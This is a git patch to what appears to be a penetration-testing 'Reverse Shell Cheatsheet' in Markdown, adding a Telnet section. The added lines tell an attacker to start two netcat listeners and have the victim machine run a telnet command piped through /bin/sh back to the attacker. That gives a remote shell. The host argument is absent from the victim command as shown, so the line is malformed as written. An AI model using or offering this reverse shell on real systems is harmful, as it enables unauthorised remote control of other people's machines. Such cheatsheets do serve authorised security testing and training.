From 0b8293b135d89a4378eff2ef4c1c9b8f6b424f37 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Thu, 1 Jul 2021 20:29:56 +0530 Subject: [PATCH] Added Reverse Shell using Telnet Added Reverse Shell using Telnet. --- Methodology and Resources/Reverse Shell Cheatsheet.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index db2683e..108e70a 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -28,6 +28,7 @@ * [Python](#python) * [Ruby](#ruby) * [Socat](#socat) + * [Telnet](#telnet) * [War](#war) * [Meterpreter Shell](#meterpreter-shell) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) @@ -248,6 +249,16 @@ Thread thread = new Thread(){ thread.start(); ``` +### Telnet +```bash +In Attacker machine start two listeners: +nc -lvp 8080 +nc -lvp 8081 + +In Victime machine run below command: +telnet 8080 | /bin/sh | telnet 8081 +``` + ### War ```java